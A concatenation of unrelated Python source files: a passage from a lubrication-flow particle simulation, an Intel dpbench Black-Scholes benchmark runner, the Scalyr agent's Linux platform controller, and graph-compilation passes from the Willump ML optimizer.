        return phi, phidx, phidx2, phidx3, h, hdx, hdx2, hdx3

    def f_phi_h(self, x):
        """Return only (phi, h) at ``x`` — cheaper than ``f``."""
        k = self.OmegaL0
        c = math.cos(k * x)
        s = math.sin(k * x)
        g = self.gamma
        d0 = self.delta_0
        phi = d0 * (s * self.cos_semi_alpha + g * c * self.sin_semi_alpha)
        h = 0.5 + d0 * (c * self.sin_semi_alpha + g * s * self.cos_semi_alpha)
        return phi, h
def z_to_eta(pp, x, z):
    """Map the physical vertical coordinate ``z`` to the wall-fitted
    coordinate ``eta`` at streamwise position ``x``."""
    wall_phi, wall_h = pp.h_and_phi_function.f_phi_h(x)
    return x, (z - wall_phi) / wall_h
def eta_to_z(pp, x, eta):
    """Inverse of `z_to_eta`: map wall-fitted ``eta`` back to physical ``z``."""
    wall_phi, wall_h = pp.h_and_phi_function.f_phi_h(x)
    return x, wall_phi + eta * wall_h
def mod_eta_to_z(pp, x, eta):
    """Like `eta_to_z`, but with the result rescaled by ``pp.epsilon``."""
    wall_phi, wall_h = pp.h_and_phi_function.f_phi_h(x)
    return x, pp.epsilon * (wall_phi + eta * wall_h)
def velocity_order_1(pp, x, eta):
    """Leading-order lubrication velocity field and derivatives at ``(x, eta)``.

    ``x`` is the dimensionless streamwise coordinate and ``eta`` the
    wall-fitted transverse coordinate.  Returns the tuple
    ``(UX, UZ, DUX, DUZ, DUX2, DUZ2)``: dimensional velocity components,
    their material (convective) derivatives, and Laplacian-type second
    derivative terms; Faxen drag corrections (proportional to ``pp.a**2``)
    are folded into the returned velocities and accelerations.
    """
    phi, phidx, phidx2, phidx3, h, hdx, hdx2, hdx3 = pp.h_and_phi_function.f(x)
    h_inv = 1.0 / h
    # Streamwise derivatives of eta(x, z) = (z - phi(x)) / h(x).
    etadx = - (phidx + eta * hdx) * h_inv
    etadx2 = h_inv ** 2 * (2 * eta * hdx ** 2 + 2 * hdx * phidx - eta * h * hdx2 - h * phidx2)
    # NOTE(review): etadx3 is computed but never used below — confirm whether
    # it was meant to feed a higher-order term.
    etadx3 = h_inv ** 3 * (- 6 * eta * hdx ** 3 - 6 * hdx ** 2 * phidx + 6 * eta * h * hdx * hdx2 + 3 * phidx * h * hdx2 + 3 * h * hdx * phidx2 - h ** 2 * eta * hdx3 - h ** 2 * phidx3)
    one_minus_eta_2 = (1.0 - eta ** 2)
    # Parabolic profile across the gap (dimensional velocities).
    UX = 0.75 * pp.U0 * h_inv * one_minus_eta_2
    UZ = - 0.75 * pp.U0 * pp.epsilon * etadx * one_minus_eta_2
    # Dimensionless spatial derivatives of the velocity components.
    uxdx = - 0.75 * h_inv ** 2 * (2 * eta * etadx * h + one_minus_eta_2 * hdx)
    uxdz = - 1.5 * eta * h_inv ** 2
    uzdx = 0.75 * (2 * eta * etadx ** 2 - etadx2 * one_minus_eta_2)
    uxdx2 = 0.75 * h_inv ** 3 * ((2 - 12 * eta ** 2) * hdx ** 2 - 12 * eta * hdx * phidx - 2 * phidx ** 2 + h * ((3 * eta ** 2 - 1) * hdx2 + 2 * eta * phidx2))
    uzdz2 = - 1.5 * h_inv ** 2 * (2 * hdx * h_inv * eta - etadx)
    uxdx3 = 0.75 * h_inv ** 4 * (hdx ** 3 * (60 * eta ** 2 - 6) + 72 * eta * hdx ** 2 * phidx + 6 * hdx * (3 * phidx ** 2 + h * (hdx2 * (1 - 6 * eta ** 2) - 3 * eta * phidx2)) + h * (- 6 * phidx * phidx2 - h * hdx3 + 3 * h * eta ** 2 * hdx3 + 2 * eta * (- 9 * phidx * etadx2 + h * phidx3)))
    uxdx2z = 1.5 * h_inv ** 4 * (- 6 * hdx * phidx + 3 * eta * (- 4 * hdx ** 2 + h * hdx2) + h * phidx2)
    uxdxz2 = 4.5 * h_inv ** 4 * hdx
    # Rescale to dimensional derivatives using the problem scales.
    UXdX = pp.U0 / pp.L0 * uxdx
    UZdX = pp.U0 * pp.epsilon / pp.L0 * uzdx
    UXdZ = pp.U0 / pp.H0 * uxdz
    UZdZ = - UXdX  # set equal and opposite to UXdX (divergence-free form)
    # Material (convective) derivatives of the velocity.
    DUX = UX * UXdX + UZ * UXdZ
    DUZ = UX * UZdX + UZ * UZdZ
    DUX2 = pp.U0 / pp.L0 ** 2 * uxdx2
    DUZ2 = - pp.U0 / (pp.L0 * pp.H0) * uzdz2
    DUX3 = pp.U0 / pp.L0 ** 3 * uxdx3
    DUX2Z = pp.U0 / (pp.L0 ** 2 * pp.H0) * uxdx2z
    DUZ2X = - DUX2Z
    DUZ3 = - pp.U0 / (pp.L0 * pp.H0 ** 2) * uxdxz2
    # Convective derivative of the Laplacian (used by the added-mass terms).
    CONV_DERIV_LAPL_X = UX * DUX3 + UZ * DUX2Z
    CONV_DERIV_LAPL_Z = UX * DUZ2X + UZ * DUZ3
    # Faxen correction terms, proportional to the particle radius squared.
    FAXEN_DRAG_X = pp.a ** 2 / 6 * DUX2
    FAXEN_DRAG_Z = pp.a ** 2 / 6 * DUZ2
    # NOTE(review): FAXEN_ADDED_MASS_* are computed but never applied below —
    # confirm whether they should be added to DUX/DUZ.
    FAXEN_ADDED_MASS_X = pp.a ** 2 / 30 * CONV_DERIV_LAPL_X
    FAXEN_ADDED_MASS_Z = pp.a ** 2 / 30 * CONV_DERIV_LAPL_Z
    # NOTE(review): the same Faxen drag term is added to both the velocity
    # and its material derivative — confirm this is intentional.
    UX += FAXEN_DRAG_X
    UZ += FAXEN_DRAG_Z
    DUX += FAXEN_DRAG_X
    DUZ += FAXEN_DRAG_Z
    return UX, UZ, DUX, DUZ, DUX2, DUZ2
def GetFlowVariables(pp, i, X, Z):
    """Evaluate the flow field at particle ``i``'s position ``(X, Z)``,
    cache the result in the bookkeeping arrays of ``pp`` and return it.

    Returns velocity, material acceleration, second derivatives and the
    distance ``D`` to the nearest wall.
    """
    x, eta = z_to_eta(pp, X / pp.L0, Z / pp.H0)
    UX, UZ, DUX, DUZ, DUX2, DUZ2 = velocity_order_1(pp, x, eta)
    # Distance to the closest of the two channel walls.
    D = min(abs(Phi1(pp, X) - Z), abs(Phi2(pp, X) - Z))
    # Mirror the evaluated state into the per-particle containers.
    cached = ((pp.randoms_horizontal, X),
              (pp.randoms_vertical, Z),
              (pp.vels_horizontal, UX),
              (pp.vels_vertical, UZ),
              (pp.accelerations_horizontal, DUX),
              (pp.accelerations_vertical, DUZ))
    for container, value in cached:
        container[i] = value
    return UX, UZ, DUX, DUZ, DUX2, DUZ2, D
def GenerateRandomPositions(pp, n_particles):
    """Populate ``pp`` with ``n_particles`` random particle positions whose
    horizontal distribution follows the local channel cross-section, plus
    sampling points for the wall curves and streamline seeds."""
    # Wall geometry sampled along one wavelength.
    pp.x_points = list(np.linspace(0, pp.L0, pp.n_points))
    pp.phi_1 = [Phi1(pp, x) for x in pp.x_points]
    pp.phi_2 = [Phi2(pp, x) for x in pp.x_points]
    pp.n_particles = n_particles
    # Uniform draws, mapped through the inverse CDF by root finding below.
    raw_horizontal = np.random.uniform(0, 1.0, n_particles)
    inverse_cdf = HorizontalDistributionMinusObjective(
        pp, pp.L0, pp.H0, pp.A1, pp.A2, pp.DeltaX)
    pp.randoms_horizontal = [0.0] * n_particles
    pp.randoms_vertical = [0.0] * n_particles
    pp.vels_horizontal = [0.0] * n_particles
    pp.vels_vertical = [0.0] * n_particles
    pp.accelerations_horizontal = [0.0] * n_particles
    pp.accelerations_vertical = [0.0] * n_particles
    for idx, guess in enumerate(raw_horizontal):
        inverse_cdf.SetObjective(guess)
        x_corrected = root_finder.FindRootBisection(inverse_cdf, guess)
        pp.randoms_horizontal[idx] = x_corrected
        # Vertical position drawn uniformly between the two walls.
        pp.randoms_vertical[idx] = np.random.uniform(
            Phi1(pp, x_corrected), Phi2(pp, x_corrected))
    # Streamline seeds in eta, excluding the two wall values -1 and 1.
    pp.eta_values = list(np.linspace(-1, 1, pp.n_streamlines))[1:-1]
def GetPositionAndFlowVariables(pp, i):
    """Look up particle ``i``'s stored position and evaluate the flow there."""
    position_x = pp.randoms_horizontal[i]
    position_z = pp.randoms_vertical[i]
    UX, UZ, DUX, DUZ, DUX2, DUZ2, D = GetFlowVariables(
        pp, i, position_x, position_z)
    return position_x, position_z, UX, UZ, DUX, DUZ, D
def PrintResult(pp, time):
    """Render the current particle distribution over the channel geometry
    and save the figure to ``fracture_<time>.png``.

    Draws the streamlines, one highlighted critical streamline, the particle
    positions (optionally with velocity arrows) and the two wall curves.
    """
    # Background streamlines at the precomputed eta levels.
    for value in pp.eta_values:
        streamline_Z_values = [pp.H0 * eta_to_z(pp, x / pp.L0, value)[1] for x in pp.x_points]
        plt.plot(pp.x_points, streamline_Z_values, color = 'b', linestyle = 'dashed')
    # Highlighted critical streamline.
    # NOTE(review): this curve is scaled by -pp.L0 via mod_eta_to_z while the
    # ordinary streamlines use pp.H0 with eta_to_z — confirm the asymmetry
    # is intentional.
    eta_critical = 0.245806
    streamline_Z_values = [-pp.L0 * mod_eta_to_z(pp, x / pp.L0, eta_critical)[1] for x in pp.x_points]
    plt.plot(pp.x_points, streamline_Z_values, color = 'r')
    # Particle positions.
    plt.scatter(pp.randoms_horizontal, pp.randoms_vertical)
    # Refresh the cached flow variables at each particle position.
    for i in range(pp.n_particles):
        X = pp.randoms_horizontal[i]
        Z = pp.randoms_vertical[i]
        UX, UZ, DUX, DUZ, DUX2, DUZ2, D = GetFlowVariables(pp, i, X, Z)
        pp.vels_horizontal[i] = UX
        pp.vels_vertical[i] = UZ
        pp.accelerations_horizontal[i] = DUX
        pp.accelerations_vertical[i] = DUZ
    if pp.plot_arrows:
        # Arrow length scaled so the largest acceleration modulus maps to a
        # fixed fraction (0.25) of the channel height.
        acc_moduli_inv = [1.0 / math.sqrt(pp.accelerations_horizontal[i] ** 2 + pp.accelerations_vertical[i] ** 2) for i in range(pp.n_particles)]
        acc_max_modul_inv = min(acc_moduli_inv)
        acc_size_coeff = acc_max_modul_inv * 0.25 * pp.H0
        for i in range(pp.n_particles):
            X = pp.randoms_horizontal[i]
            Z = pp.randoms_vertical[i]
            DUX = pp.accelerations_horizontal[i]
            DUZ = pp.accelerations_vertical[i]
            UX = pp.vels_horizontal[i]
            UZ = pp.vels_vertical[i]
            pylab.arrow(X, Z, UX * acc_size_coeff * 10, UZ * acc_size_coeff * 10, fc = "k", ec = "k", width = 0.001 * pp.H0, head_width = 0.02 * pp.H0, head_length = 0.04 * pp.H0)
    # Channel walls and figure output.
    plt.axis('equal')
    plt.plot(pp.x_points, pp.phi_1, color='k', linewidth=2)
    plt.plot(pp.x_points, pp.phi_2, color='k', linewidth=2)
    plt.savefig('fracture_' + str(time) + '.png', bbox_inches='tight')
    plt.close()
|
# Copyright (C) 2017-2018 Intel Corporation
#
# SPDX-License-Identifier: MIT
import os
import run_utils as utils
import numpy as np
from dpbench_datagen.blackscholes import gen_data_to_file, gen_rand_data
from dpbench_python.blackscholes.bs_python import black_scholes_python
# make xrange available in python 3
try:
    xrange  # Python 2: the builtin exists, nothing to do.
except NameError:
    xrange = range  # Python 3: alias to the builtin ``range``.
def ip_data_to_file(nopt):
    """Generate ``nopt`` input records by delegating to ``gen_data_to_file``
    (input files are later consumed by the native benchmark binary)."""
    gen_data_to_file(nopt)
def gen_data_np(nopt):
    """Create ``nopt`` random Black-Scholes inputs plus output buffers.

    Returns ``(price, strike, t, call, put)`` where ``call`` is zero-filled
    and ``put`` is filled with ``-1.0`` sentinels.
    """
    price, strike, t = gen_rand_data(nopt)
    call_buffer = np.zeros(nopt, dtype=np.float64)
    put_buffer = np.full(nopt, -1.0, dtype=np.float64)
    return price, strike, t, call_buffer, put_buffer
RISK_FREE = 0.1   # risk-free rate passed to the Black-Scholes kernels
VOLATILITY = 0.2  # volatility passed to the Black-Scholes kernels
# create input data, call blackscholes computation function (alg)
def run(name, sizes=14, step=2, nopt=2 ** 15):
    """Build and run the native Black-Scholes benchmark.

    name : str
        Label for the benchmark run (not used inside the body).
    sizes : int
        Number of problem sizes to sweep (overridable via --steps).
    step : int
        Multiplicative growth factor between sizes (overridable via --step).
    nopt : int
        Initial number of options (overridable via --size).
    """
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--steps", required=False, default=sizes, help="Number of steps"
    )
    parser.add_argument(
        "--step", required=False, default=step, help="Factor for each step"
    )
    parser.add_argument(
        "--size", required=False, default=nopt, help="Initial data size"
    )
    parser.add_argument(
        "--repeat", required=False, default=1, help="Iterations inside measured region"
    )
    parser.add_argument(
        "--usm",
        required=False,
        action="store_true",
        help="Use USM Shared or pure numpy",
    )
    parser.add_argument(
        "--test",
        required=False,
        action="store_true",
        # NOTE(review): "naieve" is a typo (should be "naive") in this
        # user-facing help string; left untouched here since runtime
        # strings must not change in a documentation pass.
        help="Check for correctness by comparing output with naieve Python version",
    )
    args = parser.parse_args()

    sizes = int(args.steps)
    step = int(args.step)
    nopt = int(args.size)
    repeat = int(args.repeat)

    # Rebuild the native binary from scratch; --usm selects the USM variant.
    clean_string = ["make", "clean"]
    utils.run_command(clean_string, verbose=True)
    if args.usm:
        build_string = ["make", "comp"]
        utils.run_command(build_string, verbose=True)
        exec_name = "./black_scholes_comp"
    else:
        build_string = ["make"]
        utils.run_command(build_string, verbose=True)
        exec_name = "./black_scholes"

    if args.test:
        # Correctness mode: compare native output against the pure-Python
        # reference implementation, then return without benchmarking.
        # run sequential python
        price, strike, t, p_call, p_put = gen_data_np(nopt)
        black_scholes_python(
            nopt, price, strike, t, RISK_FREE, VOLATILITY, p_call, p_put
        )
        # run dpcpp
        ip_data_to_file(nopt)
        run_cmd = [exec_name, str(nopt), str(1), "-t"]
        utils.run_command(run_cmd, verbose=True)
        # read output of dpcpp into n_call, n_put
        n_call = np.fromfile("call.bin", np.float64)
        # read output of dpcpp into n_call, n_put
        n_put = np.fromfile("put.bin", np.float64)
        # compare outputs
        if np.allclose(n_call, p_call) and np.allclose(n_put, p_put):
            print("Test succeeded\n")
        else:
            print("Test failed\n")
        return

    # Benchmark mode: start from a fresh runtimes.csv (the native binary
    # presumably appends to it — confirm against the C sources).
    if os.path.isfile("runtimes.csv"):
        os.remove("runtimes.csv")

    for i in xrange(sizes):
        # generate input data
        ip_data_to_file(nopt)
        # run the C program
        run_cmd = [exec_name, str(nopt), str(repeat)]
        utils.run_command(run_cmd, verbose=True)
        nopt *= step
        # NOTE(review): subtracting the multiplicative step factor from
        # ``repeat`` looks suspicious (integer division would be the usual
        # scaling) — confirm this is intended.
        repeat -= step
        if repeat < 1:
            repeat = 1
if __name__ == "__main__":
    # Entry point when executed as a script.
    run("Blackscholes dpcpp")
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: <NAME> <<EMAIL>>
__author__ = "<EMAIL>"  # module author contact (address appears anonymized)
import os
from sys import platform as _platform
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.platform_posix import PosixPlatformController
from scalyr_agent.platform_controller import DefaultPaths
from __scalyr__ import get_install_root, TARBALL_INSTALL, DEV_INSTALL, PACKAGE_INSTALL
class LinuxPlatformController(PosixPlatformController):
    """Platform controller for Linux hosts.

    Extends the generic POSIX controller with Linux-specific default paths
    and default monitors.
    """

    def __init__(self, stdin="/dev/null", stdout="/dev/null", stderr="/dev/null"):
        """Initialize the controller, forwarding the standard-stream targets
        to the POSIX base class."""
        PosixPlatformController.__init__(
            self, stdin=stdin, stdout=stdout, stderr=stderr
        )

    def can_handle_current_platform(self):
        """Return true if this platform object can handle the server this
        process is running on.

        @return: True if this platform instance can handle the current server.
        @rtype: bool
        """
        return _platform.lower().startswith("linux")

    @property
    def default_paths(self):
        """Default log/config/data locations for the detected install type.

        @return: The default paths
        @rtype: DefaultPaths
        """
        if self._install_type == PACKAGE_INSTALL:
            # System package install: fixed FHS-style locations.
            return DefaultPaths(
                "/var/log/scalyr-agent-2",
                "/etc/scalyr-agent-2/agent.json",
                "/var/lib/scalyr-agent-2",
            )
        if self._install_type == TARBALL_INSTALL:
            # Tarball install: everything lives under the unpacked root.
            root = get_install_root()
            return DefaultPaths(
                os.path.join(root, "log"),
                os.path.join(root, "config", "agent.json"),
                os.path.join(root, "data"),
            )
        # Developer checkout: keep all state under ~/scalyr-agent-dev with
        # log, config, and data subdirectories.
        assert self._install_type == DEV_INSTALL
        dev_root = os.path.join(os.path.expanduser("~"), "scalyr-agent-dev")
        return DefaultPaths(
            os.path.join(dev_root, "log"),
            os.path.join(dev_root, "config", "agent.json"),
            os.path.join(dev_root, "data"),
        )

    def get_default_monitors(self, config):
        """Return the default monitor configurations to use on Linux.

        The result is a list of dicts containing monitor configuration
        options just as they would appear in the configuration file; the
        list may be empty.

        @param config The configuration object to use.
        @type config configuration.Configuration

        @return: The default monitors
        @rtype: list<dict>
        """
        monitors = []
        if config.implicit_metric_monitor:
            monitors.append(
                JsonObject(module="scalyr_agent.builtin_monitors.linux_system_metrics")
            )
        if config.implicit_agent_process_metrics_monitor:
            monitors.append(
                JsonObject(
                    module="scalyr_agent.builtin_monitors.linux_process_metrics",
                    pid="$$",
                    id="agent",
                )
            )
        return monitors
|
import ast
import copy
import math
import typing
from collections import OrderedDict
from typing import MutableMapping, List, Set, Tuple, Mapping, Optional
from willump import *
from willump.graph.array_count_vectorizer_node import ArrayCountVectorizerNode
from willump.graph.array_tfidf_node import ArrayTfIdfNode
from willump.graph.cascade_point_early_exit_node import CascadePointEarlyExitNode
from willump.graph.hash_join_node import WillumpHashJoinNode
from willump.graph.identity_node import IdentityNode
from willump.graph.pandas_column_selection_node import PandasColumnSelectionNode
from willump.graph.pandas_column_selection_node_python import PandasColumnSelectionNodePython
from willump.graph.pandas_dataframe_concatenation_node import PandasDataframeConcatenationNode
from willump.graph.pandas_series_concatenation_node import PandasSeriesConcatenationNode
from willump.graph.pandas_to_dense_matrix_node import PandasToDenseMatrixNode
from willump.graph.reshape_node import ReshapeNode
from willump.graph.stack_dense_node import StackDenseNode
from willump.graph.stack_sparse_node import StackSparseNode
from willump.graph.willump_graph import WillumpGraph
from willump.graph.willump_graph_node import WillumpGraphNode
from willump.graph.willump_input_node import WillumpInputNode
from willump.graph.willump_model_node import WillumpModelNode
from willump.graph.willump_python_node import WillumpPythonNode
from willump.willump_utilities import *
def topological_sort_graph(graph: WillumpGraph) -> List[WillumpGraphNode]:
    """Return all nodes reachable from the graph's output, topologically sorted.

    First builds both adjacency directions by depth-first search (edges run
    from a node to its inputs), then applies Kahn's algorithm starting from
    the nodes that have no inputs.
    """
    # node -> list of its input nodes (the node depends on these).
    in_edges: MutableMapping[WillumpGraphNode, List[WillumpGraphNode]] = {}
    # node -> list of nodes that consume its output.
    out_edges: MutableMapping[WillumpGraphNode, List[WillumpGraphNode]] = {}
    pending: List[WillumpGraphNode] = [graph.get_output_node()]
    discovered: Set[WillumpGraphNode] = set()
    while pending:
        node = pending.pop()
        # Copy the input list: Kahn's algorithm below consumes it.
        in_edges[node] = copy.copy(node.get_in_nodes())
        if node not in out_edges:
            out_edges[node] = []
        for upstream in node.get_in_nodes():
            if upstream not in out_edges:
                out_edges[upstream] = []
            out_edges[upstream].append(node)
            if upstream not in discovered:
                discovered.add(upstream)
                pending.append(upstream)
    # Kahn's algorithm, seeded with the dependency-free nodes.
    ready: List[WillumpGraphNode] = [n for n, deps in in_edges.items() if len(deps) == 0]
    ordering: List[WillumpGraphNode] = []
    while ready:
        node = ready.pop()
        ordering.append(node)
        consumers = out_edges[node]
        while consumers:
            consumer = consumers.pop()
            in_edges[consumer].remove(node)
            if len(in_edges[consumer]) == 0:
                ready.append(consumer)
    return ordering
def push_back_python_nodes_pass(sorted_nodes: List[WillumpGraphNode]) -> List[WillumpGraphNode]:
    """
    Greedily push Python nodes and input nodes back towards the start of the
    sorted_nodes list while maintaining topological sorting.  This maximizes
    the length of Weld blocks.
    """
    for position in range(len(sorted_nodes)):
        candidate = sorted_nodes[position]
        if not (isinstance(candidate, WillumpPythonNode)
                or isinstance(candidate, WillumpInputNode)):
            continue
        needed_inputs: List[str] = candidate.get_in_names()
        destination = position
        # Walk toward the front of the list until we hit a node producing
        # one of the candidate's inputs; we cannot move above that producer.
        probe = position - 1
        while probe >= 0:
            produced = sorted_nodes[probe].get_output_names()
            if any(name in needed_inputs for name in produced):
                break
            destination = probe
            probe -= 1
        sorted_nodes.remove(candidate)
        sorted_nodes.insert(destination, candidate)
    return sorted_nodes
def find_dataframe_base_node(df_node: WillumpGraphNode,
                             nodes_to_base_map: MutableMapping[WillumpGraphNode, WillumpHashJoinNode]) \
        -> WillumpHashJoinNode:
    """
    If a model's input contains a sequence of independent joins of metadata
    onto the same table of data, identify the first join onto that data table.

    Results are memoized in ``nodes_to_base_map``: every join node visited on
    the way down the chain is mapped to the discovered base join.
    """
    # Return the memoized answer from an earlier traversal if available.
    if df_node in nodes_to_base_map:
        return nodes_to_base_map[df_node]
    base_discovery_node = df_node
    join_cols_set = set()
    touched_nodes = []
    while True:
        assert (isinstance(base_discovery_node, WillumpHashJoinNode))
        # Accumulate all join columns seen so far along the chain.
        for entry in base_discovery_node.join_col_names:
            join_cols_set.add(entry)
        touched_nodes.append(base_discovery_node)
        # Descend through the left input of the join.
        base_left_input = base_discovery_node.get_in_nodes()[0]
        # Keep descending only while the next join is itself a hash join
        # whose right table does not produce any column we joined on —
        # i.e. the joins are independent of one another.
        if isinstance(base_left_input, WillumpHashJoinNode) and not any(
                join_col_name in base_left_input.right_df_row_type.column_names for join_col_name in join_cols_set):
            base_discovery_node = base_left_input
        else:
            break
    # Memoize the discovered base for every node visited on the chain.
    for df_node in touched_nodes:
        nodes_to_base_map[df_node] = base_discovery_node
    assert (isinstance(base_discovery_node, WillumpHashJoinNode))
    return base_discovery_node
def model_input_identification_pass(sorted_nodes: List[WillumpGraphNode]) -> None:
    """
    Identify the model, if there is one, in a program, and record where each upstream node's
    output lands in the model's feature vector via model_node.set_model_inputs().  Do not modify
    the nodes in any other way.

    Each model input is described either as a half-open index range (start, end) into the
    model's feature vector, or — for dataframe-shaped inputs — as a mapping from column name
    to feature index.

    Assumption: There is one model in the program; if none is found this pass is a no-op.
    """
    # Memoization table for find_dataframe_base_node across join chains.
    nodes_to_base_map: MutableMapping[WillumpGraphNode, WillumpHashJoinNode] = {}
    # Find the (assumed unique) model node; bail out if the program has no model.
    for node in sorted_nodes:
        if isinstance(node, WillumpModelNode):
            model_node = node
            break
    else:
        return
    # A stack containing the next nodes we want to examine and what their indices are in the model.
    # Each entry is (node, (start, end) feature-index range, optional column->index mapping).
    current_node_stack: List[Tuple[WillumpGraphNode, Tuple[int, int], Optional[Mapping[str, int]]]] = \
        [(model_node.get_in_nodes()[0], (0, model_node.input_width), None)]
    # Maps each input-producing node to its slice of (or column mapping into) the feature vector.
    model_inputs: MutableMapping[WillumpGraphNode, typing.Union[Tuple[int, int], Mapping[str, int]]] = {}
    while len(current_node_stack) > 0:
        input_node, (index_start, index_end), curr_selection_map = current_node_stack.pop()
        if isinstance(input_node, ArrayCountVectorizerNode) or isinstance(input_node, ArrayTfIdfNode):
            # Vectorizers directly produce a contiguous block of features.
            model_inputs[input_node] = (index_start, index_end)
        elif isinstance(input_node, StackSparseNode):
            # A sparse stack concatenates its inputs; hand each stacked input its sub-range.
            stack_start_index = index_start
            for stacked_node in input_node.get_in_nodes():
                try:
                    output_width = stacked_node.output_width
                except AttributeError:
                    # Nodes without an explicit width must have a single WeldCSR output type.
                    assert (len(stacked_node.get_output_types()) == 1)
                    node_output_type = stacked_node.get_output_types()[0]
                    assert (isinstance(node_output_type, WeldCSR))
                    output_width = node_output_type.width
                current_node_stack.append(
                    (stacked_node, (stack_start_index, stack_start_index + output_width), curr_selection_map))
                stack_start_index += output_width
        elif isinstance(input_node, StackDenseNode):
            # Same as the sparse case, but fallback widths come from WeldVec output types.
            stack_start_index = index_start
            for stacked_node in input_node.get_in_nodes():
                try:
                    output_width = stacked_node.output_width
                except AttributeError:
                    assert (len(stacked_node.get_output_types()) == 1)
                    node_output_type = stacked_node.get_output_types()[0]
                    assert (isinstance(node_output_type, WeldVec))
                    output_width = node_output_type.width
                current_node_stack.append(
                    (stacked_node, (stack_start_index, stack_start_index + output_width), curr_selection_map))
                stack_start_index += output_width
        elif isinstance(input_node, PandasColumnSelectionNode) \
                or isinstance(input_node, PandasColumnSelectionNodePython):
            # A column selection fixes which column feeds which feature index.
            selected_columns: List[str] = input_node.selected_columns
            assert (len(selected_columns) == index_end - index_start)
            selection_map: Mapping[str, int] = {col: index_start + i for i, col in enumerate(selected_columns)}
            selection_input = input_node.get_in_nodes()[0]
            current_node_stack.append((selection_input, (index_start, index_end), selection_map))
        elif isinstance(input_node, PandasSeriesConcatenationNode) \
                or isinstance(input_node, PandasDataframeConcatenationNode):
            # Split the current column mapping among the concatenated inputs that own each column.
            for node_input_node, input_type in zip(input_node.get_in_nodes(), input_node.input_types):
                node_map = {}
                for col in curr_selection_map.keys():
                    if col in input_type.column_names:
                        node_map[col] = curr_selection_map[col]
                current_node_stack.append((node_input_node, (index_start, index_end), node_map))
        elif isinstance(input_node, WillumpHashJoinNode):
            join_left_columns = input_node.left_df_type.column_names
            join_right_columns = input_node.right_df_row_type.column_names
            output_columns = join_left_columns + join_right_columns
            if curr_selection_map is None:
                # No selection seen yet: the join's full output feeds the model in column order.
                curr_selection_map = {col: index_start + i for i, col in enumerate(output_columns)}
            join_base_node = find_dataframe_base_node(input_node, nodes_to_base_map)
            # Columns from the joined-in (right) table belong to this join node; the rest flow
            # further up the left-input chain.
            pushed_map = {}
            next_map = {}
            for col in curr_selection_map.keys():
                if col in join_right_columns:
                    pushed_map[col] = curr_selection_map[col]
                else:
                    next_map[col] = curr_selection_map[col]
            join_left_input = input_node.get_in_nodes()[0]
            model_inputs[input_node] = pushed_map
            if join_base_node is not input_node:
                current_node_stack.append((join_left_input, (index_start, index_end), next_map))
            else:
                # At the base join of the chain: remaining columns come from the data table itself.
                if len(next_map) > 0:
                    model_inputs[join_left_input] = next_map
        elif isinstance(input_node, IdentityNode) or isinstance(input_node, ReshapeNode) \
                or isinstance(input_node, PandasToDenseMatrixNode):
            # Pass-through nodes: continue to their single input with the same range/mapping.
            node_input_node = input_node.get_in_nodes()[0]
            current_node_stack.append((node_input_node, (index_start, index_end), curr_selection_map))
        elif isinstance(input_node, WillumpInputNode) or isinstance(input_node, WillumpPythonNode):
            # Graph sources: record either the column mapping (if non-empty) or the raw range.
            if curr_selection_map is not None:
                if len(curr_selection_map) > 0:
                    model_inputs[input_node] = curr_selection_map
            else:
                model_inputs[input_node] = (index_start, index_end)
        else:
            panic("Unrecognized node found when processing model inputs %s" % input_node.__repr__())
    # Every recorded input must be non-empty (ranges are 2-tuples; maps must have columns).
    assert(all(len(v) > 0 for v in model_inputs.values()))
    model_node.set_model_inputs(model_inputs)
    return
def weld_pandas_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
                                 typing_map: Mapping[str, WeldType], batch) \
        -> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
    """
    Processing pass creating Python code to marshall Pandas into a representation (struct of vec
    columns) Weld can understand, then convert that struct back to Pandas.

    Returns (input_processing_nodes, post_processing_nodes): Python glue nodes to run before and
    after the Weld block, respectively.

    # TODO: Reconstruct the original index properly.
    """
    pandas_input_processing_nodes: List[WillumpPythonNode] = []
    pandas_post_processing_nodes: List[WillumpPythonNode] = []
    if not batch:  # TODO: This is a hack, fix it -- non-batch inputs get no marshalling at all.
        return pandas_input_processing_nodes, pandas_post_processing_nodes
    for input_name in weld_block_input_set:
        input_type = typing_map[input_name]
        if isinstance(input_type, WeldPandas):
            # Temporary that preserves the original dataframe while the variable holds the tuple.
            df_temp_name = "%s__df_temp" % input_name
            # Strip line numbers from variable name.
            stripped_input_name = strip_linenos_from_var(input_name)
            # Build "col1_values, col2_values, ..." -- string columns become Python lists,
            # everything else stays a numpy array via .values.
            pandas_glue_python_args = ""
            for column, field_type in zip(input_type.column_names, input_type.field_types):
                if isinstance(field_type, WeldVec) and isinstance(field_type.elemType, WeldStr):
                    pandas_glue_python_args += "list(%s['%s'].values)," % (stripped_input_name, column)
                else:
                    pandas_glue_python_args += "%s['%s'].values," % (stripped_input_name, column)
            # Generated code: "x, x__df_temp = (cols...), x" -- x becomes the column tuple,
            # while the original dataframe is saved in the temp for later reversion.
            pandas_glue_python = "%s, %s = (%s), %s" % (
                stripped_input_name, df_temp_name, pandas_glue_python_args, stripped_input_name)
            pandas_glue_ast: ast.Module = \
                ast.parse(pandas_glue_python, "exec")
            pandas_input_node = WillumpPythonNode(python_ast=pandas_glue_ast.body[0], input_names=[],
                                                  output_names=[input_name], output_types=[], in_nodes=[])
            pandas_input_processing_nodes.append(pandas_input_node)
            # Reversion restores the original dataframe into the variable after the Weld block.
            reversion_python = "%s = %s" % (stripped_input_name, df_temp_name)
            reversion_python_ast = ast.parse(reversion_python, "exec")
            reversion_python_node = WillumpPythonNode(python_ast=reversion_python_ast.body[0],
                                                      input_names=[df_temp_name],
                                                      output_names=[stripped_input_name], output_types=[], in_nodes=[])
            # Only revert if the Weld block does not itself overwrite this variable.
            if stripped_input_name not in map(strip_linenos_from_var, weld_block_output_set):
                pandas_post_processing_nodes.append(reversion_python_node)
    for output_name in weld_block_output_set:
        output_type = typing_map[output_name]
        stripped_output_name = strip_linenos_from_var(output_name)
